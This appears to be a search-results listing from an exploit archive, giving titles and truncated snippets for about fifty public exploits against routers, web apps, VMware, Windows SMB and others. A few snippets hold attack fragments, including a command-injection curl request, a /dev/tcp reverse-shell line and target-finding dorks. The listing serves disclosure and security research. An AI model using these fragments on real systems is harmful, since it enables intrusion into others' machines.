39001 matches found
Oce Colorwave 500 CSRF / XSS / Authentication Bypass Vulnerabilities
Exploit for jsp platform in category web applications Exploit Title: Océ Colorwave 500 printer: Multiple vulnerabilities Exploit Author: Giuseppe Calì, Marco Ortisi Authors blog: https://www.redtimmy.com Vendor Homepage: https://www.canon.com Software Link:...
VMware Fusion 11.5.2 - Privilege Escalation Exploit
Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation Exploit Author: Rich Mirch Vendor Homepage: https://www.vmware.com/products/fusion.html Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html Software Link:...
NetBackup 7.0 - (NetBackup INET Daemon) Unquoted Service Path Vulnerability
Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Discovery by: Alan Mondragon "El Masas" Vendor Homepage: https://www.veritas.com/ Software Link : https://www.veritas.com/ Veritas Tested Version: 7.0 Vulnerability Type: Unquoted t Service Path Tested on OS: Windows...
Broadcom Wi-Fi Devices - (KR00K) Information Disclosure Exploit
Kr00ker Experimetal KR00K PoC in python3 using scapy Description: This script is a simple experiment to exploit the KR00K vulnerability CVE-2019-15126, that allows to decrypt some WPA2 CCMP data in vulnerable devices. More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP...
Netlink GPON Router 1.0.11 - Remote Code Execution Exploit
Exploit for hardware platform in category web applications Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls...
Microtik SSH Daemon 6.44.3 - Denial of Service Exploit
Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: An uncontrolled resource consumption vulnerability in SSH daemon on...
Microsoft VSCode Python Extension - Code Execution Exploit
VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as...
Ivanti Workspace Manager Security Bypass Vulnerability
Ivanti Workspace Manager Security Bypass Vulnerability Rem Remarks CVE-2019-10885 - 0day Rem An issue was discovered in Ivanti Workspace Control before 10.3.90.0. Local authenticated Rem users with low privileges in a Workspace Control managed session can bypass Workspace Control Rem security...
pppd 2.4.8 Buffer Overflow Exploit
Exploit Title: Point to Point Protocol Daemon versions 2.4.2 through 2.4.8 are vulnerable to buffer overflow - remote Author: nu11secur1ty Date: 2020-03-18 Vendor: Point to Point Protocol Daemon Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-8597 CVE:...
Centreon Poller Authenticated Remote Command Execution Exploit
This Metasploit module exploits a flaw where an authenticated user with sufficient administrative rights to manage pollers can use this functionality to execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules to perform certain actions, by the...
ZoneAlarm TrueVector Internet Monitor Insecure NTFS Permissions Vulnerability
A vulnerability was found in the TrueVector Internet Monitor service, which is installed as part of the Check Point ZoneAlarm firewall. This vulnerability allows a local attacker to cause the affected service to change the file permissions of arbitrary local files. After the file permissions have...
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode 232 bytes
Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode 232 bytes Shellcode Author: Bobby Cooke Date: March 2020-03-17 Tested On: Windows 10 Pro 1909 x86: HelpPane.exe, notepad.exe, certutil.exe Windows 10 Pro 1909 x8664: mmc.exe, xwizard.exe ! Will onl...
VMWare Fusion - Local Privilege Escalation Exploit
Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusion 11.0.0 10120384 on macOS 10.14.1 VMware...
Easy File Sharing Web Server 7.2 Local Buffer Overflow Exploit
Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow SEH Author: Felipe Winsnes Vendor Homepage: http://www.sharing-file.com/ Software Link: http://www.sharing-file.com/download.php Version: 7.2 Tested on: Windows 7 Proof of Concept: 1.- Run the python script...
Zyxel CNM SecuManager 3.1.0 / 3.1.1 Hardcoded Keys / XSS / Code Execution Vulnerabilities
Zyxel CNM SecuManager versions 3.1.0 and 3.1.1 suffer from having hard-coded secrets, missing authentication, backdoors, and remote code execution vulnerabilities. Zyxel CNM SecuManager 3.1.0 / 3.1.1 Hardcoded Keys / XSS / Code Execution The HTML version on "Multiple vulnerabilities found in Zyxe...
MiladWorkShop VIP System 1.0 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection Google Dork: Powered By MiladWorkShop VIP System Exploit Author: AYADI Mohamed email : email protected Vendor Homepage: https://miladworkshop.ir/ Software Link:...
Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link: http://www.sumavision.com/ensite/i.php?id=29 Version: EMR 3.0.4.27 CV...
PHPKB Multi-Language 9 image-upload.php Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.p...
UADMIN Botnet SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: UADMIN Botnet - SQL Injection Vulnerability Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: unkn0wn Version: unkn0wn Tested on: Windows 10, Kali CVE : n/a Vuln-Code: download.php $link=$GET'link';...
PHPKB Multi-Language 9 Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...
PHPKB Multi-Language 9 Authenticated Directory Traversal Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...
Microsoft Windows SMB 3.1.1 Remote Code Execution Exploit
Exploit Title: Windows SMBv3 Client/Server Remote Code Execution Vulnerability - remote Author: nu11secur1ty Vendor: https://smb.wsu.edu/ Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796 CVE: CVE-2020-0796 + Credits: Ventsislav Varbanovski @ nu11secur1ty...
Rconfig 3.x Chained Remote Code Execution Exploit
This Metasploit module takes advantage of a command injection vulnerability in the path parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required . However, this modul...
Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow
Microsoft Windows 10 1903/1909 - 'SMBGhost' SMB3.1.1 'SMB2COMPRESSIONCAPABILITIES' Buffer Overflow PoC CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip Usage ./CVE-2020-0796.py servername This scrip...
Phoenix Contact TC Router / TC Cloud Client Command Injection Vulnerability
Phoenix Contact TC Router and TC Cloud Client versions 2.05.3 and below, 2.03.17 and below, and 1.03.17 and below suffer from authenticated command injection and various other vulnerabilities. ======================================================================= title: Authenticated Command...
ManageEngine Desktop Central Java Deserialization Exploit
This Metasploit module exploits a Java deserialization vulnerability in the getChartImage method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64. This module requires Metasploit: https://metasploit.com/download Current source:...
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution Exploit
Exploit for php platform in category web applications !/bin/sh if "$" -ne 4 ; then echo '! Usage: ' 1&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$mktemp" trap 'rm -f "$JAR"' EXIT echo "+ Logging in as $USERNAME:$PASSWORD" 1&2 curl -si -c "$JAR" "$BASE/login.php" \ -d...
Drobo 5N2 4.1.1 - Remote Command Injection Exploit
Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection Date: 2020-03-12 Exploit Author: Rick Ramgattie, Ian Sindermann Vendor Homepage: https://www.drobo.com/ Version: 4.1.1 and lower. CVE: CVE-2018-14709, CVE-2018-14701 !/usr/bin/env python3 nasty.py - A proof-of-concept utility for malicious...
Centos WebPanel 7 - (term) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Centos WebPanel 7 - 'term' SQL Injection Exploit Author: Berke YILMAZ Vendor Homepage: http://centos-webpanel.com/ Software Link: http://centos-webpanel.com/ Version: v6 - v7 Tested on: Kali Linux - Windows 10 CVE : N/A Type:...
AnyBurn 4.8 - Buffer Overflow (SEH) Exploit
Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterprise x64 Vulnerability Type: Buffer...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8 Vulnerability Type :...
ASUS AAHM 1.00.22 - (asHmComSvc) Unquoted Service Path Vulnerability
Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path Discovery by: Roberto Piña Vendor Homepage: https://www.asus.com/ Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3Win10H97M-ProV10102.zip?ga=2.170180192.1334401606.1583873755-790266082.1583873755 Tested...
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading Exploit
Exploit for php platform in category web applications exploit-phar-loading.py !/usr/bin/env python3 from horde import Horde import requests import subprocess import sys TEMPDIR = '/tmp' WWWROOT = '/var/www/html' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password =...
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Vulnerability
Exploit for java platform in category web applications Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Vendor: https://www.watchguard.com Software link:...
Wordpress Appointment Booking Calendar 1.3.34 Plugin - CSV Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link:...
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion Exploit
Exploit for php platform in category web applications exploit-inc-inclusion.py !/usr/bin/env python3 from horde import Horde import subprocess import sys TEMPDIR = '/tmp' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password = sys.argv3 filename = sys.argv4 phpcode =...
SQL Server Reporting Services (SSRS) ViewState Deserialization Exploit
A vulnerability exists within Microsoft's SQL Server Reporting Services which can allow an attacker to craft an HTTP POST request with a serialized object to achieve remote code execution. The vulnerability is due to the fact that the serialized blob is not signed by the server. This module...
Joomla com_newsfeeds 1.0 Component - (feedid) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork: inurl:index.php?option=comnewsfeeds...
rConfig 3.9 - (searchColumn) SQL Injection Exploit
Exploit for php platform in category web applications Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see also :...
rConfig 3.93 - (ajaxAddTemplate.php) Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login =...
Wordpress Search Meter 2.13.2 Plugin - CSV injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip Version...
Wing FTP Server 6.2.3 Cross Site Request Forgery Vulnerability
Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation Exploit Author: Dhiraj Mishra Vendor Homepage: https://www.wftpserver.com Version: v6.2.6 Tested on: Windows 10 Summary: An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTML page could dele...
ASUS AXSP 1.02.00 - (asComSvc) Unquoted Service Path Vulnerability
Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Discovery by: Roberto Piña Vendor Homepage: https://www.asus.com/ Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3Win10H97M-ProV10102.zip?ga=2.170180192.1334401606.1583873755-790266082.1583873755 Tested...
Nagios XI - Authenticated Remote Command Execution Exploit
This Metasploit module exploits a vulnerability in Nagios XI versions before 5.6.6 in order to execute arbitrary commands as root. The module uploads a malicious plugin to the Nagios XI server and then executes this plugin by issuing an HTTP GET request to download a system profile from the serve...
YzmCMS 5.5 - (url) Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting Exploit Author: En Vendor Homepage: https://github.com/yzmcms/yzmcms Software Link: https://github.com/yzmcms/yzmcms Version: V5.5 Category: Web Application Patched Version:...
Counter Strike : GO - (.bsp) Memory Control Exploit
So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked so Linux, Windows, and macOS, even after a few years. Download...
Persian VIP Download Script 1.0 - (active) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection Exploit Author: S3FFR Vendor HomagePage: http://download.freescript.ir/scripts/Persian-VIP-DownloadFreeScript.ir.zip Version: = 1.0 Final Version Tested on: Windows,Linux...
Sysaid 20.1.11 b26 - Remote Command Execution Vulnerability
Exploit for java platform in category web applications Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution Google Dork: intext:"Help Desk Software by SysAid " Exploit Author: Ahmed Sherif Vendor Homepage: https://www.sysaid.com/free-help-desk-software Software Link:...
PHPStudy - Backdoor Remote Code execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "PHPStudy Backdoor Remote Code execution", 'Description' = %q This module can detect and exploit the backdoor of PHPStudy. , 'License' = MSFLICENS...
Citrix Gateway 11.1 / 12.0 / 12.1 Information Disclosure Vulnerability
Exploit for multiple platform in category web applications Product: Citrix Gateway Manufacturer: Citrix Systems, Inc. Affected Versions: 11.1, 12.0, 12.1 Tested Versions: 11.1.63.15, 12.0.63.13, 12.1.55.18 Vulnerability Type: Information Exposure Through Caching CWE-512 Risk Level: Information...